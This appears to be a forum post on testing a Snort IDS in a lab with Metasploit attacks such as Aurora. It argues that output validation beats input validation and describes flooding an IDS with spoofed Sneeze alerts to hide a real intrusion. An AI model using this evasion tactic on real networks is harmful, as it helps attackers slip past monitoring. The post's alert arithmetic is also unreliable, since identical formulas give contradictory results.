Testing an IDS is a strange matter since in this case, what you're testing for are "known knowns" and nothing more. These "known knowns" are nothing more than signatures cobbled together to alert you of "an event." But what happens when someone is firing off "unknowns", attacks that don't have a signature. This is what you'd want to test for, the alerting capabilities of attacks you're not aware of. This is a complicated task to pull of and if you could do it, you could likely patent the technique/method and make some money. Anyhow, there are two routes (attack vectors) to think about. An attacker attacking what's BEHIND the IDS and an attacker attacking the IDS it
Attacking against the signatures can be done with a variety of tools so I'll start with the de-facto Metasploit. Using Metasploit, you can try the following:
----- ---- HostA
| | |
| | |
Attacker 10.10.10.1 ---> | IDS | -------- HostB
| | |
| | |
----- ---- HostC
Place an attacker in what you're mimicking to be "the Internet" or a place outside of the IDS and pick a host - preferably this host would be say a VMWare image. Using Metasploit on the Attacker machine, fire off a barrage of tests aimed at it. The goal is to see what Snort can and can't see.
In the same fashion, configure Metasploit to act as a server for a client side attack. E.g. try the Aurora attack and configure Metasploit to "own" via client side say HostA and analyze the results. Did it see it, what *DOES
* it see, can you counter it.
---/ Enter the real world
Because a machine can never think like an attacker, the "testing" space would become too broad for you to continuously pound at Snort. You could NEVER
control what someone is trying to put IN. You *CAN
* control what goes out though and this is where too many people get it wrong. Terms of the day, Input Validation, Output Validation. These commonly used terms are generally thrown in the realm of web application security and here too is where they miserably fail...
Quotes from OWASP:
Input validation refers to the process of validating all the input to an application before using it.
Output validation refers to the process of validating the output of a process before it is sent to some recepient
Which do you think is more crucial? If you answered Input validation you're wrong. If you think they're equally valid, you're wrong. With Input Validation, you're trying to assume you will figure out every single INPUT potential someone can fire off at you. So let's to some logical math here rounded to 10's to make it clean. On the Internet, at any given point in time, how many connections do you think you would see to any of your machine. Couple hundred, couple of thousand? How many different ways do you think you could think for someone else? If you answered anything above 0 you're wrong.
Input validation goes with the theory that "this is a form. Someone should enter a number into this form. I will make sure only numbers are entered." You script your code to solely allow 0's. See the failure here? Just because you scripted your code, doesn't mean another layer is scripted equally. So someone tampers with say the presentation or session layer, you scripted your recipe at the application layer. Now what?
Output validation is the opposite. "This is a webserver that returns a webpage with a date." So you script your code to ONLY
print out dates. The control is more granular here. You KNOW
what it is that YOU
want the recipient to see. You can do MUCH MORE
here than you can thinking you're going to do something to stop someone from firing away. The math?
Input Validation = N * A = F
Output Validation = N * A = F
N = Number of attackers
A = Attacks launched
F = Event alerts being fired at you
With Input Validation how long before you've created a set of Frankenstein signatures and variances of those. SN would be phenomenally high versus OUTPUT validation where the signature is lower and more managable. Not only that, but what is LEAVING
holds more weight than what is COMING
in. You CAN'T
and will NEVER
be able to control the garbage on the Internet but you CAN
control what is LEAVING
your network. The attack and signature space is smaller.
Input Validation - 100(N) * 100(A) = 10,000(F)
Output Validation - 100(N) * 100(A) = 1(F)
Here we assume you will see say 100 random attackers trying 100 random attacks. Which is more important to you? Getting 10,000 alerts you will learn to ignore or ONE alert that holds weight? "What the hell is he talking about 1(F)!?
" 1(F) from the OUTPUT validation side means you don't care to see what is coming in, you want to make sure that if your server - the one you configured to show 0 spits OUT anything other than 0 in this case, your server sent a 1, this IS
mission critical because it wasn't supposed to do that. Anything else, doesn't truly matter.
With this all said, I will go back to tools now. Another tool you could use to test is Sneeze. Sneeze uses Snort's own signatures to overwhelm the IDS. Let's think about that concept and why its a useless test tool for IDS. Using V is for Vendetta as an example, imagine having a network full of people in "V" masks all lurking around. Who would you look at, what would you see?
Because Sneeze is using Snort against itself, there is nothing to stop me from generating and firing off thousands of spoofed alerts at you, getting lost amongst those alerts and getting in. With Sneeze you could create a script to do just that and ease your way in undetected but what have you really accomplished? Imagine again, just like V is for Vendetta, thousands of people with the same mask (attacks) walking in a courtyard (your network) with one actually prying the door hidden amongst the others.http://www.securiteam.com/tools/5DP0T0AB5G.html
Hope that didn't confuse